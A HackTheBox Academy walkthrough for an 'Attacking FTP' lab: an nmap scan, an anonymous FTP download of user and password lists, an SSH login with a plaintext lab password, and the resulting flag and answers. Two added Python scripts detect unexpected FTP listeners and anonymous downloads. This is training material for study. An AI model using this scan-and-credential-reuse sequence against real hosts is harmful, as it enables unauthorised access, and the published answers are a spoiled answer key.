Attacking FTP

ℹ️ Information

  • 🌐 Website: HackTheBox
  • 📚 Module: Attacking Common Services
  • 🔗 Link: Attacking FTP

Question

What port is the FTP service running on?

📋 Walkthrough

To identify the port on which the FTP service is running, we can use the nmap tool to scan the target machine. The -sC option runs default scripts, and -sV attempts to determine the version of the services running.

$ nmap -sC -sV 10.129.203.6        
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-20 14:22 UTC
Stats: 0:00:57 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.50% done; ETC: 14:23 (0:00:00 remaining)
Nmap scan report for 10.129.203.6
Host is up (0.026s latency).
Not shown: 995 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 71:08:b0:c4:f3:ca:97:57:64:97:70:f9:fe:c5:0c:7b (RSA)
|   256 45:c3:b5:14:63:99:3d:9e:b3:22:51:e5:97:76:e1:50 (ECDSA)
|_  256 2e:c2:41:66:46:ef:b6:81:95:d5:aa:35:23:94:55:38 (ED25519)
53/tcp   open  domain      ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.16.1-Ubuntu
139/tcp  open  netbios-ssn Samba smbd 4
445/tcp  open  netbios-ssn Samba smbd 4
2121/tcp open  ftp
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (InlaneFTP) [10.129.203.6]
|     Invalid command: try being more creative
|     Invalid command: try being more creative
|   NULL: 
|_    220 ProFTPD Server (InlaneFTP) [10.129.203.6]
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port2121-TCP:V=7.95%I=7%D=3/20%Time=67DC24A3%P=x86_64-pc-linux-gnu%r(NU
SF:LL,2F,"220\x20ProFTPD\x20Server\x20\(InlaneFTP\)\x20\[10\.129\.203\.6\]
SF:\r\n")%r(GenericLines,8B,"220\x20ProFTPD\x20Server\x20\(InlaneFTP\)\x20
SF:\[10\.129\.203\.6\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20mo
SF:re\x20creative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x2
SF:0creative\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: ATTCSVC-LINUX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2025-03-20T13:22:46
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: -1h00m04s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.00 seconds
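
The scan results show the line 2121/tcp open ftp together with a 220 ProFTPD Server (InlaneFTP) greeting, so the FTP service is running on port 2121 rather than the default port 21.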
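
The same reading of the scan can be automated as an inventory check over saved nmap output. The following is an added example, not part of the original walkthrough: the function name, the expected_ports policy and the product list are assumptions, and the sample is a trimmed copy of the output above.

```python
import re

# Constructed sample: a trimmed copy of the scan output shown above.
SCAN = """\
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 4
2121/tcp open  ftp
| fingerprint-strings:
|   GenericLines:
|     220 ProFTPD Server (InlaneFTP) [10.129.203.6]
|     Invalid command: try being more creative
|   NULL:
|_    220 ProFTPD Server (InlaneFTP) [10.129.203.6]
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

PORT_LINE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)\s*(.*)$")
GREETING = re.compile(r"^\|[_ ]\s+(220[ -].+)$")    # FTP greeting inside script output
PRODUCTS = re.compile(r"proftpd|vsftpd|pure-ftpd|filezilla", re.I)  # assumed list

def ftp_findings(nmap_text, expected_ports=(21,)):
    """Return FTP listeners from nmap normal output with banner and policy notes."""
    findings, current = [], None
    for line in nmap_text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            current = None
            if m.group(2).rstrip("?") in ("ftp", "ftps"):
                current = {"port": int(m.group(1)), "version": m.group(3).strip(),
                           "banner": None, "notes": []}
                findings.append(current)
            continue
        if not line.startswith("|"):      # script output for this port has ended
            current = None
            continue
        g = GREETING.match(line)
        if current and g and current["banner"] is None:
            current["banner"] = g.group(1).strip()
    for f in findings:
        if f["port"] not in expected_ports:
            f["notes"].append("FTP on unexpected port")
        if f["banner"] and PRODUCTS.search(f["banner"]):
            f["notes"].append("greeting discloses server software")
    return findings

if __name__ == "__main__":
    for f in ftp_findings(SCAN):
        print(f["port"], f["banner"], "; ".join(f["notes"]))
```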

Answer

2121

Question

What username is available for the FTP server?

📋 Walkthrough

To find the available username for the FTP server, we can connect to the FTP service using the ftp command and attempt to log in with the anonymous username.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ ftp 10.129.203.6 -p 2121
Connected to 10.129.203.6.
220 ProFTPD Server (InlaneFTP) [10.129.203.6]
Name (10.129.203.6:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||7108|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 ftp      ftp          1959 Apr 19  2022 passwords.list
-rw-rw-r--   1 ftp      ftp            72 Apr 19  2022 users.list
226 Transfer complete
ftp> cat users.list
?Invalid command.
ftp> get users.list
local: users.list remote: users.list
229 Entering Extended Passive Mode (|||28183|)
150 Opening BINARY mode data connection for users.list (72 bytes)
    72       37.86 KiB/s 
226 Transfer complete
72 bytes received in 00:00 (2.70 KiB/s)
ftp> get passwords.list
local: passwords.list remote: passwords.list
229 Entering Extended Passive Mode (|||59961|)
150 Opening BINARY mode data connection for passwords.list (1959 bytes)
  1959      570.72 KiB/s 
226 Transfer complete
1959 bytes received in 00:00 (68.50 KiB/s)
ftp> exit
221 Goodbye.

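The server replies 230 Anonymous access granted, so the FTP server allows anonymous login and the username anonymous is available. The listing also shows that the anonymous session can read and download two files, users.list and passwords.list.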
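
On the server side, the two downloads in this session are visible in the transfer log. The following is an added detection example, not part of the original walkthrough. It assumes the server writes a standard xferlog-format transfer log; the log lines, client addresses, paths and the name pattern are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed xferlog lines: addresses, paths and the "alice" record are made up;
# the two file names and sizes match the session above.
XFERLOG = """\
Thu Mar 20 14:25:02 2025 0 192.0.2.10 72 /srv/ftp/users.list b _ o a kali@ ftp 0 * c
Thu Mar 20 14:25:09 2025 0 192.0.2.10 1959 /srv/ftp/passwords.list b _ o a kali@ ftp 0 * c
Thu Mar 20 14:31:40 2025 1 192.0.2.77 5120 /home/alice/report.pdf b _ i r alice ftp 0 * c
"""

# Assumed pattern for file names that should never sit in an anonymous root.
SENSITIVE = re.compile(r"(passw|user|cred|secret|shadow|\.key$|\.pem$)", re.I)

def parse_xferlog(line):
    """Split one record; the file name sits between 8 leading and 9 trailing fields."""
    f = line.split()
    if len(f) < 18 or not f[7].isdigit():
        return None
    tail = f[-9:]
    return {
        "time": " ".join(f[:5]),
        "host": f[6],
        "size": int(f[7]),
        "path": " ".join(f[8:-9]),
        "direction": tail[2],   # o = download, i = upload, d = delete
        "access": tail[3],      # a = anonymous, g = guest, r = real account
        "user": tail[4],        # for anonymous sessions: the password string sent
        "status": tail[8],      # c = complete, i = incomplete
    }

def anonymous_downloads(log_text):
    """Group completed anonymous downloads by client and mark credential-like names."""
    by_host = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_xferlog(line)
        if rec and (rec["access"], rec["direction"], rec["status"]) == ("a", "o", "c"):
            name = rec["path"].rsplit("/", 1)[-1]
            rec["sensitive"] = bool(SENSITIVE.search(name))
            by_host[rec["host"]].append(rec)
    return dict(by_host)

if __name__ == "__main__":
    for host, recs in anonymous_downloads(XFERLOG).items():
        for r in recs:
            tag = "ALERT" if r["sensitive"] else "info"
            print(f'{tag} {r["time"]} {host} anonymous download {r["path"]} ({r["size"]} bytes)')
```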

Answer

anonymous

Question

Use the discovered username with its password to login via SSH and obtain the flag.txt file. Submit the contents as your answer.

📋 Walkthrough

Using the discovered username robin and its password 7iz4rnckjsduza7, we can log in to the target machine via SSH and retrieve the flag.txt file.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ ssh robin@10.129.203.6 
robin@10.129.203.6's password: 
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-109-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 20 Mar 2025 02:11:54 PM UTC

  System load:  0.0                Processes:               231
  Usage of /:   25.5% of 13.72GB   Users logged in:         0
  Memory usage: 14%                IPv4 address for ens160: 10.129.203.6
  Swap usage:   0%

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

0 updates can be applied immediately.



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

$ ls
flag.txt
$ cat flag.txt
HTB{ATT4CK1NG_F7P_53RV1C3}
$ 

The contents of the flag.txt file are HTB{ATT4CK1NG_F7P_53RV1C3}.

Answer

HTB{ATT4CK1NG_F7P_53RV1C3}